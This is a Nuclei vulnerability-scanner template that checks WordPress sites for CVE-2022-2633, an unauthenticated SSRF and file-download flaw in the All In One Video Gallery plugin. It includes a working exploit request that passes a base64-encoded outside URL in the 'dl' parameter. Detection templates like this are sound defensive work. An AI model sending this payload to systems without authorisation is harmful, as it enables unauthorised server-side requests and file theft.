nuclei-templates/cves/2022/CVE-2022-2633.yaml

37 lines
1.1 KiB
YAML
Raw Normal View History

2022-09-28 17:20:46 +00:00
id: CVE-2022-2633
info:
name: All In One Video Gallery Plugin - Unauthenticated Arbitrary File Download & SSRF vulnerability
author: theamanrawat
description: |
Unauthenticated Arbitrary File Download & SSRF vulnerability in WordPress All In One Video Gallery Plugin (versions <= 2.6.0).
reference:
- https://wpscan.com/vulnerability/852c257c-929a-4e4e-b85e-064f8dadd994
2022-09-29 05:05:17 +00:00
- https://blog.amanrawat.in/2022/09/28/CVE-2022-2633.html
2022-09-28 17:20:46 +00:00
- https://wordpress.org/plugins/all-in-one-video-gallery/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2633
2022-09-29 05:02:08 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-2633
2022-09-28 17:20:46 +00:00
classification:
cve-id: CVE-2022-2633
metadata:
verified: true
tags: cve2022,wp-plugin,unauth,ssrf,wpscan,cve,wordpress,wp,all-in-one-video-gallery
2022-09-28 17:20:46 +00:00
requests:
2022-09-29 07:18:07 +00:00
- raw:
- |
@timeout: 10s
GET /index.php/video/?dl={{base64('http://interact.sh/')}} HTTP/1.1
Host: {{Hostname}}
2022-09-28 17:20:46 +00:00
matchers-condition: and
matchers:
2022-09-28 17:34:30 +00:00
- type: word
part: body
words:
2022-09-29 07:18:07 +00:00
- 'Interactsh Server'
2022-09-28 17:20:46 +00:00
2022-09-28 17:34:30 +00:00
- type: status
status:
- 200